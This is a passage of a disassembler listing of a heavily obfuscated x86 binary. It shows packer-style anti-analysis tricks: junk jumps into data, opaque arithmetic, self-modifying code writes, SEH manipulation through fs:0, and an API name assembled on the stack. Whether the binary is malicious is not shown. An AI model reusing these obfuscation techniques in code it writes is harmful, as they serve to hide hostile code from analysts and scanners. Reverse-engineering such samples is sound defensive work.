dd 0F35AE824h, 0FFFFh
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_487DC2
loc_48C468: ; CODE XREF: sub_487DC2+5j
jmp loc_488F22
; END OF FUNCTION CHUNK FOR sub_487DC2
; ---------------------------------------------------------------------------
align 2
dw 3EE9h
dd 0FFFFC9h, 0E88D02C6h, 0FFFFECF9h, 0FFE299E9h, 0F2815DFFh
dd 0D5B8FC26h
dword_48C488 dd 0C281D503h, 65F57322h, 2AF6128Bh, 48A24D68h, 0E72AE900h
; DATA XREF: znnrn47v:0048BEAEo
db 2 dup(0FFh), 0
; ---------------------------------------------------------------------------
loc_48C49F: ; CODE XREF: znnrn47v:0048C05Ej
push 8AB54DEDh
pop edi
or edi, 0FF44CBD3h
test edi, 4
jmp near ptr dword_488D84+30h
; ---------------------------------------------------------------------------
align 4
loc_48C4B8: ; CODE XREF: znnrn47v:loc_48B287j
pop edi
jmp near ptr dword_487FFC+1Dh
; ---------------------------------------------------------------------------
align 10h
loc_48C4C0: ; CODE XREF: znnrn47v:loc_487AA8j
; znnrn47v:0048BD1Aj
jo loc_489B24
jb loc_488303
jmp near ptr dword_487A48+0Bh
; ---------------------------------------------------------------------------
align 2
dw 850Fh
dd 0FFFFE8B7h, 0D209108Bh, 0B8EC840Fh, 1BE9FFFFh, 0FFFFCEh
db 0
; ---------------------------------------------------------------------------
loc_48C4E9: ; CODE XREF: znnrn47v:004887D4j
cmp eax, 0AB38AA51h
jmp loc_48AFE6
; ---------------------------------------------------------------------------
dd 0CDC6815Eh, 817FA4ABh, 40C1C8F6h, 0EDC6814Ah, 81723B75h
dd 0DF0554EEh, 0B5C68119h, 3146B66h, 96E95EC6h, 0FFFFE9h
dd 0E48C0F00h, 0E9FFFFDDh, 0FFFFBA68h, 4870000h, 58F08B24h
dd 0C0090050h, 0FFF73CE9h, 0F0000FFh, 8CB85h, 0CD7DE900h
db 2 dup(0FFh), 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48BACA
loc_48C547: ; CODE XREF: sub_48BACA:loc_48BBCDj
push 0AA09505Eh
xchg esi, [esp+0]
mov edi, esi
pop esi
jmp loc_488A9B
; END OF FUNCTION CHUNK FOR sub_48BACA
; ---------------------------------------------------------------------------
align 4
dd 0E8C20300h, 70Ah, 689C5900h, 0DE607B33h, 0A091B951h
dd 0C3E90048h, 0FFFFE4h
db 0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_598. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48D039
loc_48C576: ; CODE XREF: sub_48D039-37FEj
jmp nullsub_614
; END OF FUNCTION CHUNK FOR sub_48D039
; ---------------------------------------------------------------------------
jmp sub_48A71A
; ---------------------------------------------------------------------------
dword_48C580 dd 879C00C6h, 0C28B2414h, 0D0CB815Ah, 0E8E2EBC5h, 0FFFFD671h
; DATA XREF: znnrn47v:loc_48CBDFo
db 0
; ---------------------------------------------------------------------------
loc_48C595: ; CODE XREF: znnrn47v:0048B625j
jmp loc_48B0CC
; =============== S U B R O U T I N E =======================================
sub_48C59A proc near ; CODE XREF: znnrn47v:00488916j
; znnrn47v:loc_489F61p
arg_0 = dword ptr 4
xchg eax, [esp+0]
xchg edx, [esp+0]
mov eax, edx
pop edx
add edi, 8134D2BFh
xchg edi, [esp-4+arg_0]
jmp nullsub_593
sub_48C59A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 2
dw 0F0B8h
dd 0E90043E5h, 0FFFFDD91h, 0A2B8F681h, 0C6C194ACh, 0ACC6811Ch
dd 0C1D53394h, 92681AC6h, 0E90048BEh, 0FFFFD566h
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48C11B
loc_48C5D9: ; CODE XREF: sub_48C11B+12j
or esi, 4F6071DCh
add esi, 2068426Ch
popf
jmp loc_48BDD9
; END OF FUNCTION CHUNK FOR sub_48C11B
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_489135
loc_48C5EC: ; CODE XREF: sub_489135+10ECj
jnp loc_48C414
pop edi
push ecx
loc_48C5F4: ; CODE XREF: sub_489135:loc_48ADDEj
push eax
mov eax, ecx
xchg eax, [esp+0]
push 4ADF5867h
pop ecx
jmp loc_48CC40
; END OF FUNCTION CHUNK FOR sub_489135
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48C14F
loc_48C605: ; CODE XREF: sub_48C14F-11Cj
push edx
mov edx, edi
xchg edx, [esp+0]
push 0FE5B85FFh
pop edi
rol edi, 3
test edi, 400h
jmp near ptr loc_489AE9+1
; END OF FUNCTION CHUNK FOR sub_48C14F
; ---------------------------------------------------------------------------
byte_48C61F db 81h ; DATA XREF: sub_48CA24-2C86o
dd 16064EC1h, 17BA526Eh, 0E90048B2h, 0FFFFC4BCh
dword_48C630 dd 5B0303C6h, 48874D68h, 0ECC2E900h ; DATA XREF: sub_48B52C:loc_4894FCo
db 2 dup(0FFh), 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_488955
loc_48C63F: ; CODE XREF: sub_488955:loc_48A4FFj
call sub_48B677
loc_48C644: ; CODE XREF: znnrn47v:0048A714j
jmp loc_488ABC
; END OF FUNCTION CHUNK FOR sub_488955
; ---------------------------------------------------------------------------
db 3Bh, 0DFh, 0E9h
dd 0FFFFB625h
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48C14F
loc_48C652: ; CODE XREF: sub_48C14F:loc_488B76j
push offset loc_48AA9F
jmp loc_4894D8
; END OF FUNCTION CHUNK FOR sub_48C14F
; ---------------------------------------------------------------------------
dd 48D06268h, 0D233E900h, 0FFFFh
dword_48C668 dd 0B2EB7968h, 243C8742h, 815FC78Bh, 36BFF3C0h, 9E881B4h
; DATA XREF: sub_48A5BC-2056o
dd 8144D47Dh, 0DD54D2C0h, 0F3BAE97Eh, 0D681FFFFh, 2893011Eh
dd 0FFD570E9h, 8B0000FFh, 8C685300h, 528E921Eh, 0FFDC93E9h
db 0FFh, 2 dup(0)
; ---------------------------------------------------------------------------
loc_48C6A7: ; CODE XREF: znnrn47v:0048BD5Aj
xchg eax, [esp]
pop eax
test ecx, 200000h
jmp near ptr dword_48AB38+1Dh
; ---------------------------------------------------------------------------
align 4
retn
; ---------------------------------------------------------------------------
align 2
loc_48C6BA: ; CODE XREF: znnrn47v:0048B520j
jmp near ptr dword_48A994+2Eh
; ---------------------------------------------------------------------------
align 10h
db 0
byte_48C6C1 db 0C6h, 2, 8Dh ; DATA XREF: znnrn47v:loc_48C9D3o
dd 854B6856h, 815EC508h, 3D2388C6h, 73CE81FBh, 0E9771D19h
dd 0FFFFB640h, 0D667FF81h, 0D4E9C7EEh, 51FFFFD3h, 48A0FCB9h
dd 0F9E3E900h
db 2 dup(0FFh)
; ---------------------------------------------------------------------------
loc_48C6F2: ; CODE XREF: znnrn47v:loc_487FF5j
call sub_48BD79
add cl, ch ; CODE XREF: sub_48C85B+9j
fmul qword ptr [eax]
; ---------------------------------------------------------------------------
db 0
db 3 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_488955
loc_48C6FF: ; CODE XREF: sub_488955+25A3j
jmp loc_48AEBE
; END OF FUNCTION CHUNK FOR sub_488955
; ---------------------------------------------------------------------------
jmp loc_48A122
; ---------------------------------------------------------------------------
db 2 dup(0)
; =============== S U B R O U T I N E =======================================
sub_48C70B proc near ; CODE XREF: znnrn47v:loc_48AB2Ap
; znnrn47v:0048CCDEj
arg_0 = dword ptr 4
xchg esi, [esp+0]
pop esi
mov byte ptr [esi], 0C3h
xchg ebp, [esp-4+arg_0]
mov esi, ebp
pop ebp
call near ptr dword_488BA8+0Ah
or esi, eax
jmp sub_4880A0
sub_48C70B endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
locret_48C726: ; CODE XREF: znnrn47v:loc_4894DDj
retn
; ---------------------------------------------------------------------------
align 4
dd 0E9C81300h, 0FFFFED3Eh, 2ACA8100h, 0E912FA61h, 0FFFFEF3Bh
dd 0DE5AE95Fh
db 2 dup(0FFh)
; ---------------------------------------------------------------------------
loc_48C742: ; CODE XREF: znnrn47v:0048B806j
push 0CDC1AE95h
xchg eax, [esp]
mov esi, eax
pop eax
rol esi, 1Ah
jmp near ptr dword_48A248+1Fh
; ---------------------------------------------------------------------------
align 2
dw 0C681h
dd 0B8827EC6h, 8104C6C1h, 57E045C6h, 0E9C60351h, 0FFFFF3D7h
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_48C76E: ; CODE XREF: znnrn47v:0048BFADj
jz near ptr loc_488F33+1
; START OF FUNCTION CHUNK FOR sub_48A5BC
loc_48C774: ; CODE XREF: sub_48A5BC-21Bj
jmp loc_489413
; END OF FUNCTION CHUNK FOR sub_48A5BC
; ---------------------------------------------------------------------------
db 2 dup(0), 81h
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
db 5Ch, 5Fh, 30h
dd 8A0F9968h, 0FFFFB88Ah, 0FFC7A7E9h, 873E87FFh, 51582404h
dd 68E9C88Bh
db 0D6h, 2 dup(0FFh)
; ---------------------------------------------------------------------------
loc_48C79B: ; CODE XREF: znnrn47v:00488BF1j
rol edx, 0Bh
xchg edi, [esp]
xchg edx, [esp]
mov edi, edx
pop edx
sub eax, edx
jz loc_489FEE
jmp loc_48B09F
; ---------------------------------------------------------------------------
db 0
byte_48C7B5 db 68h, 57h, 92h ; DATA XREF: sub_487DC2:loc_488F22o
dd 84E90048h, 0FFFFECh, 87FD1B00h, 8B5A2414h, 0D3A9E800h
db 2 dup(0FFh), 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48C14F
loc_48C7CF: ; CODE XREF: sub_48C14F:loc_48C249j
add edi, 181CA5E7h
jmp loc_489D83
; END OF FUNCTION CHUNK FOR sub_48C14F
; ---------------------------------------------------------------------------
align 4
dword_48C7DC dd 0B0BC15FFh, 16E80045h, 0FFFFBAh ; DATA XREF: znnrn47v:0048B6C6o
db 0
; ---------------------------------------------------------------------------
loc_48C7E9: ; CODE XREF: znnrn47v:0048ACAAj
jmp near ptr dword_489610+2
; ---------------------------------------------------------------------------
dw 0C300h
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_48C7F2: ; CODE XREF: znnrn47v:0048CB37j
jmp near ptr dword_48A584+4
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_48AC88
loc_48C7F8: ; CODE XREF: sub_48AC88+Dj
jmp loc_489F37
; END OF FUNCTION CHUNK FOR sub_48AC88
; ---------------------------------------------------------------------------
align 2
dw 0C87h
dd 68525924h, 0EFC64F67h, 0FFBDEAE9h
db 0FFh
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_611. PRESS KEYPAD "+" TO EXPAND]
dw 879Ch
dd 875A2414h, 0C68B2434h, 0FFCC54E9h, 94E800FFh, 0E9FFFFCBh
dd 0FFFFE58Bh
db 0
; ---------------------------------------------------------------------------
loc_48C829: ; CODE XREF: znnrn47v:0048A579j
shr edx, 1Fh
; =============== S U B R O U T I N E =======================================
sub_48C82C proc near ; CODE XREF: sub_48BD79:loc_488228p
; FUNCTION CHUNK AT 0048AF85 SIZE 0000000B BYTES
xchg esi, [esp+0]
pop esi
mov byte ptr [ecx], 2Ch
pop ecx
jmp loc_48AF85
sub_48C82C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 2
locret_48C83A: ; CODE XREF: znnrn47v:0048ADC4j
retn
; ---------------------------------------------------------------------------
align 4
db 0
; ---------------------------------------------------------------------------
loc_48C83D: ; CODE XREF: znnrn47v:00488310j
jmp locret_488327
; ---------------------------------------------------------------------------
align 4
loc_48C844: ; DATA XREF: znnrn47v:0048ADBFo
xor edx, 190C194h
xchg edx, [esp]
loc_48C84D: ; DATA XREF: znnrn47v:00488A09o
pushf
jmp loc_48CB8B
; ---------------------------------------------------------------------------
align 4
dd 398B0F00h
db 3 dup(0FFh)
; =============== S U B R O U T I N E =======================================
sub_48C85B proc near ; CODE XREF: znnrn47v:0048A8D2p
xchg edi, [esp+0]
pop edi
push offset loc_48CB2E
jmp near ptr loc_48C6F7+1
sub_48C85B endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48A234
loc_48C869: ; CODE XREF: sub_48A234+9j
pop edx
and edx, 48CE8D0Ah
rol edx, 0Dh
add edx, 3EC8C082h
popf
xchg edx, [esp-8+arg_4]
jmp loc_48A56E
; END OF FUNCTION CHUNK FOR sub_48A234
; ---------------------------------------------------------------------------
dw 4DE9h
dd 0FFFFD5h, 0E880E900h, 0FFFFh
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_615. PRESS KEYPAD "+" TO EXPAND]
align 2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_606. PRESS KEYPAD "+" TO EXPAND]
align 4
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48C14F
loc_48C895: ; CODE XREF: sub_48C14F-3566j
jmp loc_4899D5
; END OF FUNCTION CHUNK FOR sub_48C14F
; ---------------------------------------------------------------------------
align 4
loc_48C89C: ; CODE XREF: znnrn47v:0048D031j
mov byte ptr [ecx], 83h
xchg edi, [esp]
mov ecx, edi
pop edi
pop large dword ptr fs:0
jmp loc_48BB16
; ---------------------------------------------------------------------------
db 2 dup(0)
; =============== S U B R O U T I N E =======================================
sub_48C8B3 proc near ; CODE XREF: znnrn47v:loc_48B462p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0048C2EE SIZE 00000011 BYTES
xchg ebx, [esp+0]
pop ebx
mov byte ptr [ebx], 87h
pop ebx
mov ebp, esp
jmp loc_48C2EE
sub_48C8B3 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_48C8C2 proc near ; DATA XREF: znnrn47v:0048BBF1o
push offset loc_48AFEB
jmp nullsub_617
sub_48C8C2 endp
; ---------------------------------------------------------------------------
db 0
byte_48C8CD db 87h, 4, 24h ; DATA XREF: sub_488FBC+3ECDo
dd 0FFB95AE9h, 25E800FFh, 0FFFFC3h
db 0
; ---------------------------------------------------------------------------
loc_48C8DD: ; CODE XREF: znnrn47v:00489BBDj
mov byte ptr [esi], 0Fh
pop esi
mov byte ptr [ecx], 85h
pop ecx
jmp loc_489E72
; ---------------------------------------------------------------------------
xor eax, 0BF51FD6Fh
jmp loc_48B7A6
; ---------------------------------------------------------------------------
align 2
push 0D45A7C52h
jmp sub_4897A2
; ---------------------------------------------------------------------------
xchg edx, [esp]
xchg ebp, [esp]
mov edx, ebp
pop ebp
loc_48C909: ; CODE XREF: znnrn47v:00489156j
pop ecx
xchg ebx, [esp]
jmp near ptr dword_488FE4+1
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
loc_48C913: ; DATA XREF: znnrn47v:0048AABAo
jnb loc_48B0D3
push esi
push ecx
push 1CD6B5F2h
jmp loc_48CB13
; ---------------------------------------------------------------------------
align 2
loc_48C926: ; CODE XREF: znnrn47v:00489EBDj
jno loc_4887B1
call sub_488C5F
loc_48C931: ; DATA XREF: znnrn47v:loc_489B45o
add [ebx+48B14805h], cl
add al, ch
popa
; ---------------------------------------------------------------------------
dw 0FFFEh
; ---------------------------------------------------------------------------
inc dword ptr [eax]
; =============== S U B R O U T I N E =======================================
sub_48C93E proc near ; CODE XREF: znnrn47v:00488981j
; FUNCTION CHUNK AT 00488A3D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048A3CC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048BA0B SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0048BCB1 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0048BF26 SIZE 0000000A BYTES
xchg edx, [esp+0]
pop edx
add eax, edi
push ebx
jmp loc_48A3CC
sub_48C93E endp
; ---------------------------------------------------------------------------
dw 0C600h
; ---------------------------------------------------------------------------
add al, [edi-74DBC379h]
xlat
pop edi
push 8DDCC992h
sar dword ptr [esp], 1
jmp loc_48CDF4
; ---------------------------------------------------------------------------
db 0Fh, 86h, 0B2h
db 0EEh, 2 dup(0FFh)
; =============== S U B R O U T I N E =======================================
sub_48C967 proc near ; CODE XREF: znnrn47v:0048A758p
arg_0 = dword ptr 4
xchg ebx, [esp+0]
pop ebx
add esi, 0FE146751h
xchg esi, [esp-4+arg_0]
jmp sub_48A71A
sub_48C967 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 0E9h, 15h, 0FEh
dd 0E900FFFFh, 0FFFFFB3Ch, 8B500000h, 240487C2h, 48C959BAh
dd 0FFB5E900h, 0FFFFh, 0ADCBC881h, 0F0810811h, 34E1F5D5h
dd 0A552C881h, 0C081E56Eh, 0D3199637h, 6DAE9h
db 3 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_489135
loc_48C9B7: ; CODE XREF: sub_489135+10F8j
sbb edx, 0F613278Fh
jno loc_48899C
adc esi, eax
jg nullsub_594
jmp loc_48ADDC
; END OF FUNCTION CHUNK FOR sub_489135
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_618. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_48C9D3: ; CODE XREF: znnrn47v:0048B0D9j
push offset byte_48C6C1
jmp near ptr dword_487CA0+29h
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48AE05
loc_48C9DF: ; CODE XREF: sub_48AE05:loc_48CE4Bj
call sub_487DC2
; END OF FUNCTION CHUNK FOR sub_48AE05
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_48C9E6: ; CODE XREF: znnrn47v:0048952Cj
ror ebx, 15h
shl ebp, 1Dh
loc_48C9EC: ; CODE XREF: znnrn47v:00489522j
add esi, 4F37C69Eh
call near ptr dword_488DFC+1
add bl, al
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48D039
loc_48C9FB: ; CODE XREF: sub_48D039-42C6j
jmp loc_488344
; END OF FUNCTION CHUNK FOR sub_48D039
; ---------------------------------------------------------------------------
dd 3364C681h, 98E87729h, 0FFFFC8h, 0FFF8FEE9h, 0C30000FFh
; ---------------------------------------------------------------------------
locret_48CA14: ; CODE XREF: znnrn47v:0048B735j
retn
; ---------------------------------------------------------------------------
db 2 dup(0), 0E9h
dd 0FFFFF210h
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48920C
loc_48CA1E: ; CODE XREF: sub_48920C+9j
jmp loc_488BCC
; END OF FUNCTION CHUNK FOR sub_48920C
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_48CA24 proc near ; CODE XREF: znnrn47v:0048BCFBp
; FUNCTION CHUNK AT 00489D92 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00489EF3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048B7E8 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0048B949 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048CE0B SIZE 00000012 BYTES
xchg ecx, [esp+0]
pop ecx
mov eax, cs
loc_48CA2A: ; DATA XREF: znnrn47v:0048975Bo
xor al, al
jmp loc_48B949
sub_48CA24 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 2 dup(0), 0C6h
dd 2C878702h, 5DD58B24h, 0FFE358E9h
db 0FFh
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_489582
loc_48CA41: ; CODE XREF: sub_489582:loc_4895BFj
pop ecx
jz loc_48B10E
push 95142CBEh
pop eax
jmp loc_48A347
; END OF FUNCTION CHUNK FOR sub_489582
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48C14F
loc_48CA53: ; CODE XREF: sub_48C14F+6Fj
add edi, 0F846245Bh
jmp loc_4887CE
; END OF FUNCTION CHUNK FOR sub_48C14F
; ---------------------------------------------------------------------------
db 0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_579. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_48CA60: ; CODE XREF: znnrn47v:00488836j
jmp loc_48BFBC
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48A28E
loc_48CA66: ; CODE XREF: sub_48A28E+10j
jmp nullsub_610
; END OF FUNCTION CHUNK FOR sub_48A28E
; ---------------------------------------------------------------------------
align 4
db 0
; ---------------------------------------------------------------------------
loc_48CA6D: ; CODE XREF: znnrn47v:0048A94Fj
xchg edi, [esp]
xchg ebx, [esp]
mov edi, ebx
pop ebx
jmp loc_48B0FE
; ---------------------------------------------------------------------------
db 53h
dd 1C87DA8Bh, 80F5BA24h, 0BAE90048h, 81FFFFE9h, 9912EAF0h
dd 81C5035Bh, 946E1DC0h, 0C3F4E894h
db 2 dup(0FFh)
; ---------------------------------------------------------------------------
loc_48CA9E: ; CODE XREF: znnrn47v:0048AC4Ej
jmp near ptr dword_488674+3Dh
; ---------------------------------------------------------------------------
align 4
dword_48CAA4 dd 78E66852h, 0C87A383h, 59D18B24h, 35CBE281h, 0CA81CC8Bh
; DATA XREF: znnrn47v:00489A88o
dd 0A1F570CEh, 0D32C850Fh, 0E900FFFFh, 0FFFFB133h
; ---------------------------------------------------------------------------
loc_48CAC8: ; CODE XREF: znnrn47v:00489855j
jnz loc_48A621
jmp loc_48B989
; ---------------------------------------------------------------------------
align 4
db 0
; ---------------------------------------------------------------------------
loc_48CAD5: ; CODE XREF: znnrn47v:0048B7AEj
push 48926Ah
jmp near ptr dword_48924C+1Ch
; ---------------------------------------------------------------------------
loc_48CADF: ; CODE XREF: znnrn47v:0048BD6Cj
mov eax, [eax]
or eax, eax
call far ptr 64FFh:0FFBFD384h
pop large dword ptr ds:0
add esp, 4
push 0CE55E0A1h
jmp loc_488270
; ---------------------------------------------------------------------------
align 2
loc_48CAFE: ; DATA XREF: sub_48AADF+2421o
xchg edx, [esp]
push ebx
pushf
push 0EA5D62F2h
pop ebx
rol ebx, 5
jmp loc_48B5B9
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_48CB13: ; CODE XREF: znnrn47v:0048C920j
pop ecx
xor ecx, 1BC162Bh
jnz near ptr word_488CA6+1
push 0AB78EFB7h
pushf
push ebp
jmp near ptr word_488CA6+1
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_48CB2E: ; CODE XREF: znnrn47v:loc_48A70Dj
; DATA XREF: sub_48C85B+4o
add edi, 50B44AC9h
xchg edi, [esp]
jmp loc_48C7F2
; ---------------------------------------------------------------------------
dd 8B570000h, 243C87FBh, 0FFD7E3E9h, 870000FFh, 0F7E8240Ch
dd 3, 0FFB991E9h
db 0FFh, 2 dup(0)
; ---------------------------------------------------------------------------
loc_48CB5B: ; CODE XREF: znnrn47v:loc_48B989j
test ebp, eax
jmp loc_48A60D
; ---------------------------------------------------------------------------
align 4
loc_48CB64: ; CODE XREF: znnrn47v:00489AA2j
jns loc_488622
xchg eax, [edi]
jmp loc_48AED4
; ---------------------------------------------------------------------------
align 2
dw 0F223h
dd 0FFF294E9h
db 0FFh, 2 dup(0)
; ---------------------------------------------------------------------------
loc_48CB7B: ; CODE XREF: znnrn47v:0048908Bj
mov ecx, [ecx]
xchg ecx, [esp]
push edi
push offset word_48AB9E
jmp locret_48AB9B
; ---------------------------------------------------------------------------
loc_48CB8B: ; CODE XREF: znnrn47v:0048C84Ej
push 1560014Bh
pop eax
add eax, 0FA68D210h
and eax, 5DC46122h
xor eax, 0FAEB5B3Ch
call sub_48CF6A
; ---------------------------------------------------------------------------
dd 0E9C30000h, 0FFFFFBA6h, 0FFF526E9h, 0C30000FFh
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48A3D2
loc_48CBB9: ; CODE XREF: sub_48A3D2:loc_48996Dj
xor eax, 613B39FDh
add eax, ebp
add eax, 61233B1Dh
push offset sub_48ADE9
jmp nullsub_618
; END OF FUNCTION CHUNK FOR sub_48A3D2
; ---------------------------------------------------------------------------
align 2
push eax
mov eax, offset byte_48CFCF
jmp loc_48CC7D
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_48CBDF: ; CODE XREF: znnrn47v:loc_489998j
push offset dword_48C580
jmp loc_48BDD3
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48B1BE
loc_48CBEB: ; CODE XREF: sub_48B1BE-1ECAj
test ebx, eax
jmp loc_48A8E2
; END OF FUNCTION CHUNK FOR sub_48B1BE
; ---------------------------------------------------------------------------
db 0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_594. PRESS KEYPAD "+" TO EXPAND]
db 0
; ---------------------------------------------------------------------------
loc_48CBF5: ; DATA XREF: znnrn47v:0048B730o
xchg eax, [esp]
jmp loc_4892FC
; ---------------------------------------------------------------------------
db 0Fh, 83h, 0B4h
dd 51FFFFDAh, 0F37B9B68h, 54E9598Eh, 0FFFFFBEh, 0FFC9BF85h
dd 0AD781FFh, 85DE7745h, 0B8DCE9F7h, 6800FFFFh, 5B1B4540h
dd 0C0E6815Eh, 81BD725Fh, 691E3EEh, 8D4C68D6h, 5AE90048h
dd 0FFFFF7h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_489135
loc_48CC40: ; CODE XREF: sub_489135+34CBj
add ecx, 0E0EAA90h
xor ecx, 0EB4EBF44h
sub ecx, 0C0A9A86Eh
or ecx, 0D14B0797h
add ecx, 0C49AA4Bh
jmp loc_48A6D7
; END OF FUNCTION CHUNK FOR sub_489135
; ---------------------------------------------------------------------------
align 4
sbb edx, 6AC32D1h
xchg ecx, [esp]
pop ecx
pop edx
push ebx
mov ebx, 48B4E2h
jmp loc_488539
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
db 0
; ---------------------------------------------------------------------------
loc_48CC7D: ; CODE XREF: znnrn47v:0048CBD8j
call near ptr dword_48C22C+0Dh
; START OF FUNCTION CHUNK FOR sub_48ADE9
loc_48CC82: ; CODE XREF: sub_48ADE9+Cj
jmp nullsub_594
; END OF FUNCTION CHUNK FOR sub_48ADE9
; ---------------------------------------------------------------------------
loc_48CC87: ; CODE XREF: znnrn47v:00489C76j
jmp locret_488ECB
; ---------------------------------------------------------------------------
db 0, 0C3h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48A5BC
loc_48CC8E: ; CODE XREF: sub_48A5BC+51Dj
jmp near ptr dword_4880FC+1Ah
; END OF FUNCTION CHUNK FOR sub_48A5BC
; ---------------------------------------------------------------------------
align 4
db 0
; ---------------------------------------------------------------------------
loc_48CC95: ; CODE XREF: znnrn47v:00488A0Ej
call sub_48BACA
; START OF FUNCTION CHUNK FOR sub_48A920
loc_48CC9A: ; CODE XREF: sub_48A920+126Aj
jmp nullsub_601
; END OF FUNCTION CHUNK FOR sub_48A920
; ---------------------------------------------------------------------------
db 9Ch
dd 0FFEFD5E9h, 0E80000FFh, 0FFFFCD1Bh
db 0
; ---------------------------------------------------------------------------
loc_48CCAD: ; CODE XREF: znnrn47v:loc_48A41Ej
call sub_48A96C
; ---------------------------------------------------------------------------
dw 0
; ---------------------------------------------------------------------------
loc_48CCB4: ; CODE XREF: znnrn47v:00489EF9j
add edx, esi
not edi
rol edx, 0Dh
not ebx
and edi, 82647AF4h
xor edi, 41C5CB02h
rol edi, 1
xor edi, 874203EDh
jmp loc_48AD03
; ---------------------------------------------------------------------------
dw 5000h
; ---------------------------------------------------------------------------
jns loc_48C02D
jmp sub_48C70B
; ---------------------------------------------------------------------------
byte_48CCE3 db 87h ; DATA XREF: znnrn47v:0048BEE2o
dd 0D08B2404h, 0E3815B58h, 0D6026C1Ah, 0FFD372E9h
db 0FFh, 2 dup(0)
; ---------------------------------------------------------------------------
loc_48CCF7: ; CODE XREF: znnrn47v:0048B7D7j
call sub_489F66
jnz loc_4891DC
jmp near ptr dword_48B554+18h
; ---------------------------------------------------------------------------
align 4
db 0
; =============== S U B R O U T I N E =======================================
sub_48CD09 proc near ; CODE XREF: znnrn47v:00488E23p
; znnrn47v:0048BDFBj
xchg edx, [esp+0]
pop edx
mov dword ptr [ebp-18h], 74726956h
push ebx
jmp near ptr dword_48872C+13h
sub_48CD09 endp
; ---------------------------------------------------------------------------
dw 0D585h
dd 0FFFB34E9h, 860F00FFh, 1DDh, 0FFE90FE9h, 810000FFh
dd 0DC2EFACBh, 0D0A9E91Ah, 0FFFFh, 0AC88C881h, 0CA859FC6h
dd 0FFC8F6E9h
db 0FFh, 0
word_48CD4A dw 3C6h ; DATA XREF: sub_48C93E:loc_48BF26o
dd 0F58EE80Fh
db 2 dup(0FFh)
; ---------------------------------------------------------------------------
loc_48CD52: ; CODE XREF: znnrn47v:00489BEAj
jmp loc_48B3C1
; ---------------------------------------------------------------------------
align 4
dd 487C18Bh, 9E8AB924h, 0E5E90048h, 0FFFFACh, 52840F00h
dd 0FFFFCDh, 13118700h, 44C281F7h, 0E9345075h, 0FFFFF95Ch
dd 3C60000h, 243C8703h, 815FDF8Bh, 4FA11EAh, 0FFE281B2h
dd 0C1080CE0h, 0F2811FC2h, 354C4A29h, 0FFD788E9h, 348700FFh
